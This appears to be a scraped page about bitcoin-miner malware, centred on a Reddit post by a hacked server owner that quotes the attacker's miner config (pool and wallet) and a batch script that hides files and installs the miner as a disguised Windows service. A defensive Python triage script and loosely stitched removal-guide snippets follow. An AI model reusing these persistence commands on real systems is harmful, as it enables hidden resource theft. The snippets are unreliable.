Bitcoin Miner Virus - How to detect and remove it ...

MoneroOcean pool owner supports botnets

Hi guys,
As of late my vps that was running Microsoft's RDP got hacked. The attacker ran a malware miner named system.exe that was using 99% CPU. I'm gonna post a screenshot of all of it right here so he gets publicly exposed for his deeds.
https://imgur.com/a/yArkTR8
By further investigation I found that this miner uses config.json as its configuration file and I'm posting the contents also publicly here:
{
  "algo": "cryptonight",
  "api": {
    "port": 0,
    "access-token": null,
    "id": null,
    "worker-id": null,
    "ipv6": false,
    "restricted": true
  },
  "asm": true,
  "autosave": true,
  "av": 0,
  "background": false,
  "colors": true,
  "cpu-affinity": null,
  "cpu-priority": null,
  "donate-level": 0,
  "huge-pages": true,
  "hw-aes": null,
  "log-file": null,
  "max-cpu-usage": 100,
  "pools": [
    {
      "url": "gulf.moneroocean.stream:80",
      "user": "44CZd8EvSktM2FzqMVbMBc9pWDcL45yYTWY3VzdymUbjDG6F1734vQh4dj9hjn7tj3eFohS8NGSDSNNVzBxLt7Eb8Vw8vrq",
      "pass": "x",
      "rig-id": null,
      "nicehash": false,
      "keepalive": false,
      "variant": -1,
      "enabled": true,
      "tls": false,
      "tls-fingerprint": null
    }
  ],
  "print-time": 60,
  "retries": 5,
  "retry-pause": 5,
  "safe": false,
  "threads": [
    { "low_power_mode": 1, "affine_to_cpu": false, "asm": true },
    { "low_power_mode": 1, "affine_to_cpu": false, "asm": true },
    { "low_power_mode": 1, "affine_to_cpu": false, "asm": true }
  ],
  "user-agent": null,
  "watch": true
}
cmd.bat contents are the following:
attrib -a -s -r -h C:\WINDOWS\Debug\nat*
net stop Networks
taskkill /f /im system.exe
C:\WINDOWS\Debug\nat\svchost.exe install "Networks20181019" C:\WINDOWS\Debug\nat\system.exe
sc config "Networks20181019" DisplayName= "Networksr20181019"
sc description "Networks20181019" "Microsoft Windows Networks"
Set ProcessName=system.exe
sc start "Networks20181019"
attrib +a +s +r +h C:\WINDOWS\Debug\nat*
echo u/off
del %USERPROFILE%\Desktop\0.exe
I've scanned everything on VirusTotal and upon visiting the pool I've noticed that the miner has a hefty 50 KH/s. I've also contacted the pool owner via Discord and can post the whole discussion if anyone is willing to see it. In short, he doesn't want to ban the miner.
I'm not so familiar with Monero but I had Bitcoins and I fully support the mining community. I understand that people with botnets increase difficulty for normal people to make a profit. I've also reported this guy to his ISP by examining the IP found in Event Viewer, since he didn't use a VPN (the IP isn't detected as a proxy). I won't post the IPs publicly.
What more can I do? The pool owner also threatened me to report another XMR wallet address to SupportXMR pool because he thought I was a competitive attacker. I can also give that address as well.
Thank you for reading and stay safe :)
submitted by r00t_of_bnets to Monero
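
For triaging artifacts like the config.json and cmd.bat quoted in the post above, the following added example (not part of the original post) extracts the pool endpoint, payout wallet and service-persistence indicators, and flags an svchost.exe that sits outside System32. The sample inputs are constructed, with a placeholder pool and wallet, and the function names are this example's own.

```python
import json
import re

# Constructed sample artifacts modelled on the post; pool and wallet are placeholders.
SAMPLE_CONFIG = '''{"algo": "cryptonight", "donate-level": 0, "max-cpu-usage": 100,
 "pools": [{"url": "pool.example.invalid:80", "user": "WALLET_PLACEHOLDER",
            "pass": "x", "tls": false}]}'''
SAMPLE_BAT = r'''attrib -a -s -r -h C:\WINDOWS\Debug\nat*
C:\WINDOWS\Debug\nat\svchost.exe install "Networks20181019" C:\WINDOWS\Debug\nat\system.exe
sc description "Networks20181019" "Microsoft Windows Networks"
sc start "Networks20181019"
attrib +a +s +r +h C:\WINDOWS\Debug\nat*
'''

def triage_config(text):
    """Pull pool endpoints and payout wallets out of a miner's JSON config."""
    cfg = json.loads(text)
    pools = []
    for p in cfg.get("pools", []):
        url = p.get("url", "").split("://")[-1]      # drop a scheme if present
        host, sep, port = url.rpartition(":")
        if not sep:                                   # no port given
            host, port = url, ""
        pools.append({"host": host, "port": int(port) if port.isdigit() else None,
                      "wallet": p.get("user"), "tls": bool(p.get("tls"))})
    return {"pools": pools, "max_cpu": cfg.get("max-cpu-usage")}

def triage_batch(text):
    """Extract persistence indicators from a service-installing batch script."""
    out = {"services": set(), "binaries": set(), "hidden_paths": []}
    for line in map(str.strip, text.splitlines()):
        # "<wrapper>.exe install <name> <binary>": a wrapper registering a service
        m = re.match(r'(\S+\.exe)\s+install\s+"?([^"\s]+)"?\s+(\S+)', line, re.I)
        if m:
            out["services"].add(m.group(2))
            out["binaries"].update((m.group(1), m.group(3)))
        m = re.match(r'sc\s+(?:config|description|start)\s+"?([^"\s]+)', line, re.I)
        if m:
            out["services"].add(m.group(1))
        # attrib adding both +h and +s hides the path from default Explorer views
        m = re.match(r'attrib\s+((?:[+-][a-z]\s+)+)(\S+)', line, re.I)
        if m and {"+h", "+s"} <= set(m.group(1).lower().split()):
            out["hidden_paths"].append(m.group(2))
    return out

def masquerading(binaries):
    """Flag svchost.exe copies outside System32/SysWOW64, where the real one lives."""
    return sorted(b for b in binaries
                  if re.search(r'\\svchost\.exe$', b, re.I)
                  and not re.search(r'\\(system32|syswow64)\\', b, re.I))
```

The extracted service names, hidden paths and pool host can be fed into host and network hunts across other machines that shared the same RDP exposure.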


BitCoin miner virus or BitCoin mining virus is a dangerous malware that may use your CPU and/or GPU to obtain BitCoin cryptocurrency by mining illegally. Cryptocurrency miners keep hitting computers and trying to use their resources to generate revenue for their developers. Even though this type of infection is called BitCoinMiner, it does mine for digital currencies such as Monero ...

The CoinMiner virus abuses your computer's processing power so that the virus's owner earns money from the intensive computations. This practical tip explains exactly how the principle of BitCoin mining works. Download the free program Malwarebytes Anti-Malware from CHIP and install it. This is an extremely reliable ...

The virus's malicious activity consists of running multiple malicious scripts on the infected PC through a backdoor that the Bitcoin Miner virus runs beforehand. These scripts are meant to connect the virus to a command-and-control server. If the mining virus uses different classes to run more scripts that allow various actions to be carried out:

The virus can redirect your browser searches and collect personal data. Virus: removing Bitcoinminer.sx. The bitcoinminer.sx virus rarely comes alone. Your computer is probably infected with other malware as well. To remove the trojan, first download Malwarebytes Anti-Malware and install the free program on your PC. With this program ...

Crypto-miner malware infects your PC or other devices like an ordinary virus, but then starts using your device to compute a digital currency. For Bitcoins, for instance, ...


Virus mining bitcoins on my computer!

Hello! I noticed my computer was slow, caused by a virus that was mining Bitcoins on my computer. In this video you can follow how I solved the problem. Production and editing: Me ...

For more information: https://www.bitcoinmining.com and https://www.weusecoins.com What is Bitcoin Mining? Have you ever wondered how Bitcoin is generated? T...

There's a horrible bitcoin mining virus spreading through Russia. This Russian Bitcoin Virus is stealing credit card info. Putin Adviser on bitcoin ransomware: “In regions with lower bandwidth ...

Remove bitcoin miner trojan Virus (Virus Removal Guide) Visit Site :- https://www.uninstallallpcvirus.com/remove-bitcoin-miner-trojan-virus-virus-removal-gui...

Crypto-malware is one of the latest malware threats, and it's particularly insidious because, unlike ransomware, it can go about doing its work completely un...
